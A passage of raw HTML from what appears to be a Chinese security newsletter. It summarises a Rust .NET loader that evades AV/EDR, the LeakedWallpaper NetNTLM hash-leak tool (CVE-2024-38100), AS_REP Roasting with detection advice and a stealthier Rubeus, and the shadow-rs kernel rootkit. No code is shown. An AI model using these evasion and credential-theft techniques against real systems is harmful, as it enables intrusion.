支持使用 RC4 加密有效载荷，增加了安全性和隐蔽性。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">成功绕过多个安全产品：该工具已在多个主流的反恶意软件和 EDR 产品中进行了测试，并且在不引起行为检测的情况下成功加载和执行 .NET 程序集。</section></li></ul>
	<br/>
	<p>🏷️: Rust, Windows, AMSI, 反病毒, C2</p><h3 style="margin-top: 30px;margin-bottom: 15px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="display: none;"></span><span style="font-size: 18px;color: rgb(34, 34, 34);line-height: 1.8em;letter-spacing: 0em;padding-left: 10px;border-style: none none none solid;border-width: 1px 1px 1px 2px;border-color: rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 150, 136);border-radius: 0px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;box-shadow: none;display: block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">0x0a
			 泄露壁纸工具利用漏洞泄露用户NetNTLM哈希</span></h3>
	<blockquote style="-webkit-text-stroke-width:0px;background-color:rgb(251, 249, 253);border-bottom-color:rgba(0, 0, 0, 0.4);border-bottom-style:none;border-left-color:rgb(53, 179, 120);border-left-style:solid;border-radius:0px;border-right-color:rgba(0, 0, 0, 0.4);border-right-style:none;border-top-color:rgba(0, 0, 0, 0.4);border-top-style:none;border-width:3px;box-shadow:rgba(0, 0, 0, 0) 0px 0px 0px 0px;box-sizing:border-box;color:rgba(0, 0, 0, 0.85);display:block;font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:normal;margin:20px 0px;orphans:2;overflow:auto;padding:10px 10px 10px 20px;text-align:start;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-spacing:0px;">
		<p><span style="background-color:rgb(251,249,253);color:rgb(63,63,63);font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:16px;"></span><span style="-webkit-text-stroke-width:0px;display:inline !important;float:none;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:0.32px;orphans:2;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;widows:2;word-spacing:0px;">网页介绍了一个名为 LeakedWallpaper 的特权升级工具，该工具可以利用 CVE-2024-38100 漏洞（已在 KB5040434 中修复），从计算机上的任何会话中泄露用户的 NetNTLM 哈希值，即使是从低权限用户账户操作。</span>
		</p>
	</blockquote><section style="color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);margin-top: 20px;margin-bottom: 10px;border-width: initial;border-style: none;border-color: initial;overflow: hidden;">
	<section style="display: flex;flex-wrap: nowrap;overflow-x: scroll;">
	
	<img class="rich_pages wxw-img" data-ratio="0.11194029850746269" style="vertical-align: middle;border-style: none;margin-right: auto;margin-left: auto;display: inline-block;" data-w="670" src="https://wechat2rss.xlab.app/img-proxy/?k=eb5675e6&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2Ficqm3vRUymZkIWNibegTVbjl4P8oUnsxdsEWEicicJia3xGRGF0CrmX6qhiagagvY1PXa8r2h1wNnFkcoWPClm7aYiasg%2F640%3Ffrom%3Dappmsg"/>
	
	<img class="rich_pages wxw-img" data-ratio="0.504950495049505" data-w="606" style="vertical-align: middle;border-style: none;margin-right: auto;margin-left: auto;display: inline-block;" src="https://wechat2rss.xlab.app/img-proxy/?k=18092428&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2Ficqm3vRUymZkIWNibegTVbjl4P8oUnsxdshPVW9P1rmuGcpaGLbPNKkunYjVLgSKpkwb6VNusdWiasnz6l2fgA9PA%2F640%3Ffrom%3Dappmsg"/>
	
	<img class="rich_pages wxw-img" data-ratio="0.14444444444444443" data-w="1080" style="vertical-align: middle;border-style: none;margin-right: auto;margin-left: auto;display: inline-block;" src="https://wechat2rss.xlab.app/img-proxy/?k=e51be83f&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2Ficqm3vRUymZkIWNibegTVbjl4P8oUnsxdsKeMHjGJpjJ80Cv4CRqJocSZUTgqfLYz6mMIBDatQ6Mu8Ag6UtKOPaw%2F640%3Ffrom%3Dappmsg"/>
	</section></section><p style="margin-bottom: 0px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: 0em;text-indent: 0em;text-wrap: wrap;background-color: rgb(255, 255, 255);color: rgb(89, 89, 89);font-size: 16px;line-height: 1.8em;text-align: center;"><span style="display: block;color: rgb(136, 136, 136);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;">&lt;&lt;&lt;左右滑动见更多 &gt;&gt;&gt;</span></p>
	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">热评</span>
	</h3><ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">壁纸泄露可暴露敏感信息，微软发布补丁修复漏洞</section></li></ul>
	<section>
		<mp-common-miniprogram class="js_uneditable custom_select_card mp_miniprogram_iframe" data-miniprogram-nickname="知识星球" data-miniprogram-avatar="http://mmbiz.qpic.cn/mmbiz_png/kialtkOXGKS4dUh8fgYibf2xQHEgUH6RvJGicQ90YpZY3nVxKuuuc19CqV5HIn0nTreQFKSR0mVTNHvRNzD5TQItw/640?wx_fmt=png&amp;wxfrom=200" data-miniprogram-title="参与更多讨论" data-miniprogram-imageurl="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZkIWNibegTVbjl4P8oUnsxdshqv4S7yum3NmvIkZLEpvMtIoS8WNfcrQbkXCwE6x0RQVpXov4ia2GIw/0?from=appmsg" data-miniprogram-type="card" data-miniprogram-servicetype="0" data-pluginname="insertminiprogram" data-miniprogram-appid="wx4f706964b979122a" data-miniprogram-applink="#小程序://知识星球/" data-miniprogram-imageurlback="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZkIWNibegTVbjl4P8oUnsxdshqv4S7yum3NmvIkZLEpvMtIoS8WNfcrQbkXCwE6x0RQVpXov4ia2GIw/0?from=appmsg" data-miniprogram-cropperinfo="%7B%22c%22%3A%7B%22x%22%3A0%2C%22y%22%3A0%2C%22x2%22%3A180%2C%22y2%22%3A144%2C%22w%22%3A180%2C%22h%22%3A144%7D%7D" data-miniprogram-path="pages/topicdetail/topicdetail?topic_id=4844184125255828"></mp-common-miniprogram>
	</section>
	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">关键信息点</span>
	</h3><ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">LeakedWallpaper 工具的核心功能：能够在不需要用户交互的情况下，从任何会话中捕获 NetNTLM 哈希值，这对于渗透测试和特权升级攻击具有重要意义。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">漏洞修复：CVE-2024-38100 漏洞已在 KB5040434 安全更新中得到修复，强调了及时更新系统的重要性。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">工具的操作方式：通过在低权限账户中执行工具并引用远程图片文件，诱使高权限账户进行身份验证，进而捕获其哈希值。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">教育和演示资源：网页提供了一个 YouTube 视频链接和一个演示文件，用于教育用户如何使用该工具，以及在网络环境中可能遇到的问题。</section></li></ul>
	<br/>
	<p>🏷️: 漏洞利用, NetNTLM哈希, 权限提升</p><h3 style="margin-top: 30px;margin-bottom: 15px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="display: none;"></span><span style="font-size: 18px;color: rgb(34, 34, 34);line-height: 1.8em;letter-spacing: 0em;padding-left: 10px;border-style: none none none solid;border-width: 1px 1px 1px 2px;border-color: rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 150, 136);border-radius: 0px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;box-shadow: none;display: block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">0x0b
			 Kerberos安全：红蓝队攻防策略之AS_REP Roasting</span></h3>
	<blockquote style="-webkit-text-stroke-width:0px;background-color:rgb(251, 249, 253);border-bottom-color:rgba(0, 0, 0, 0.4);border-bottom-style:none;border-left-color:rgb(53, 179, 120);border-left-style:solid;border-radius:0px;border-right-color:rgba(0, 0, 0, 0.4);border-right-style:none;border-top-color:rgba(0, 0, 0, 0.4);border-top-style:none;border-width:3px;box-shadow:rgba(0, 0, 0, 0) 0px 0px 0px 0px;box-sizing:border-box;color:rgba(0, 0, 0, 0.85);display:block;font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:normal;margin:20px 0px;orphans:2;overflow:auto;padding:10px 10px 10px 20px;text-align:start;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-spacing:0px;">
		<p><span style="background-color:rgb(251,249,253);color:rgb(63,63,63);font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:16px;"></span><span style="-webkit-text-stroke-width:0px;display:inline !important;float:none;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:0.32px;orphans:2;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;widows:2;word-spacing:0px;">网页主要介绍了AS_REP Roasting攻击的原理、OPSEC考虑、检测策略以及如何通过修改Rubeus工具来进行更隐蔽的攻击。</span>
		</p>
	</blockquote><section style="color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);margin-top: 20px;margin-bottom: 10px;border-width: initial;border-style: none;border-color: initial;overflow: hidden;">
	<section style="display: flex;flex-wrap: nowrap;overflow-x: scroll;">
	
	<img class="rich_pages wxw-img" data-ratio="0.7139107611548556" style="vertical-align: middle;border-style: none;margin-right: auto;margin-left: auto;display: inline-block;" data-w="762" src="https://wechat2rss.xlab.app/img-proxy/?k=56405100&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2Ficqm3vRUymZkIWNibegTVbjl4P8oUnsxdsx6cmpE2WefMWLLFlVzct6x9YVavHAqOZ6IMrTW0GRQh3lEB8yGslJg%2F640%3Ffrom%3Dappmsg"/>
	
	<img class="rich_pages wxw-img" data-ratio="0.490234375" data-w="1024" style="vertical-align: middle;border-style: none;margin-right: auto;margin-left: auto;display: inline-block;" src="https://wechat2rss.xlab.app/img-proxy/?k=542483f3&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2Ficqm3vRUymZkIWNibegTVbjl4P8oUnsxdsnw17xNVrvGupiaB0VicT4hs1VPmYfaZSnIQn7HrUSSWLZlhhibmaT3H4g%2F640%3Ffrom%3Dappmsg"/>
	
	<img class="rich_pages wxw-img" data-ratio="0.3897058823529412" data-w="408" style="vertical-align: middle;border-style: none;margin-right: auto;margin-left: auto;display: inline-block;" src="https://wechat2rss.xlab.app/img-proxy/?k=09fddc69&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2Ficqm3vRUymZkIWNibegTVbjl4P8oUnsxdsb9ddbY7HF6xeskM1PMvRZ2GgncKboeI8NmfQGq6uGDFMmu3HIFMTNw%2F640%3Ffrom%3Dappmsg"/>
	</section></section><p style="margin-bottom: 0px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: 0em;text-indent: 0em;text-wrap: wrap;background-color: rgb(255, 255, 255);color: rgb(89, 89, 89);font-size: 16px;line-height: 1.8em;text-align: center;"><span style="display: block;color: rgb(136, 136, 136);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;">&lt;&lt;&lt;左右滑动见更多 &gt;&gt;&gt;</span></p>
	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">热评</span>
	</h3><ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">Kerberos OPSEC：红蓝对抗中的攻击与防御策略（第二部分：AS REP 攻击）</section></li></ul>
	<section>
		<mp-common-miniprogram class="js_uneditable custom_select_card mp_miniprogram_iframe" data-miniprogram-nickname="知识星球" data-miniprogram-avatar="http://mmbiz.qpic.cn/mmbiz_png/kialtkOXGKS4dUh8fgYibf2xQHEgUH6RvJGicQ90YpZY3nVxKuuuc19CqV5HIn0nTreQFKSR0mVTNHvRNzD5TQItw/640?wx_fmt=png&amp;wxfrom=200" data-miniprogram-title="参与更多讨论" data-miniprogram-imageurl="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZkIWNibegTVbjl4P8oUnsxdsLfAWptnkpjMpnhYJCicQ1bE96AytT3tdRErlyuVVDcgmwRuGOwaArGA/0?from=appmsg" data-miniprogram-type="card" data-miniprogram-servicetype="0" data-pluginname="insertminiprogram" data-miniprogram-appid="wx4f706964b979122a" data-miniprogram-applink="#小程序://知识星球/" data-miniprogram-imageurlback="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZkIWNibegTVbjl4P8oUnsxdsLfAWptnkpjMpnhYJCicQ1bE96AytT3tdRErlyuVVDcgmwRuGOwaArGA/0?from=appmsg" data-miniprogram-cropperinfo="%7B%22c%22%3A%7B%22x%22%3A0%2C%22y%22%3A0%2C%22x2%22%3A180%2C%22y2%22%3A144%2C%22w%22%3A180%2C%22h%22%3A144%7D%7D" data-miniprogram-path="pages/topicdetail/topicdetail?topic_id=2855188555144841"></mp-common-miniprogram>
	</section>
	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">关键信息点</span>
	</h3><ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">AS_REP Roasting攻击利用了Kerberos协议中的一个漏洞，即用户可以请求另一用户的TGT而不需要知道密码。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">攻击者可以通过暴力破解加密的会话密钥来尝试获取用户密码，尤其是当密码不够复杂时。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">检测AS_REP Roasting攻击可以通过监控特定的LDAP查询、Kerberos票证加密类型、票证选项以及来源进程等手段来实现。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">为了提高攻击的隐蔽性，攻击者可以通过修改Rubeus工具的代码来避免生成易于检测的行为，例如使用AES256加密、添加Name-Canonicalize标志等。</section></li></ul>
	<br/>
	<p>🏷️: Kerberos, AS_REP Roasting, 红队, 蓝队, 安全策略</p><h3 style="margin-top: 30px;margin-bottom: 15px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="display: none;"></span><span style="font-size: 18px;color: rgb(34, 34, 34);line-height: 1.8em;letter-spacing: 0em;padding-left: 10px;border-style: none none none solid;border-width: 1px 1px 1px 2px;border-color: rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 150, 136);border-radius: 0px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;box-shadow: none;display: block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">0x0c
			 使用Rust语言开发的Windows内核Rootkit项目（shadow-rs）</span></h3>
	<blockquote style="-webkit-text-stroke-width:0px;background-color:rgb(251, 249, 253);border-bottom-color:rgba(0, 0, 0, 0.4);border-bottom-style:none;border-left-color:rgb(53, 179, 120);border-left-style:solid;border-radius:0px;border-right-color:rgba(0, 0, 0, 0.4);border-right-style:none;border-top-color:rgba(0, 0, 0, 0.4);border-top-style:none;border-width:3px;box-shadow:rgba(0, 0, 0, 0) 0px 0px 0px 0px;box-sizing:border-box;color:rgba(0, 0, 0, 0.85);display:block;font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:normal;margin:20px 0px;orphans:2;overflow:auto;padding:10px 10px 10px 20px;text-align:start;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-spacing:0px;">
		<p><span style="background-color:rgb(251,249,253);color:rgb(63,63,63);font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:16px;"></span><span style="-webkit-text-stroke-width:0px;display:inline !important;float:none;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:0.32px;orphans:2;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;widows:2;word-spacing:0px;">Windows Kernel Rootkit in Rust (shadow-rs) 是一个旨在利用 Rust 语言安全和性能特性开发 Windows 内核根本套件的项目，目前正在积极开发中，专注于教育和研究目的，并明确警告不要滥用该软件。</span>
		</p>
	</blockquote><section style="color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);margin-top: 20px;margin-bottom: 10px;border-width: initial;border-style: none;border-color: initial;overflow: hidden;">
	<section style="display: flex;flex-wrap: nowrap;overflow-x: scroll;">
	
	<img class="rich_pages wxw-img" data-ratio="0.19607843137254902" data-w="102" style="vertical-align: middle;border-style: none;margin-right: auto;margin-left: auto;display: inline-block;" src="https://wechat2rss.xlab.app/img-proxy/?k=abf25947&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_svg%2F98Nz5LFElxzdExAnJcAwRHYS1bUueFicTJzziaoms3FotIeSefqIicH3CAewwicednVqwz8oBraiaNQaxezK45W3O8SR5sVwA70gD%2F640%3Ffrom%3Dappmsg"/>
	
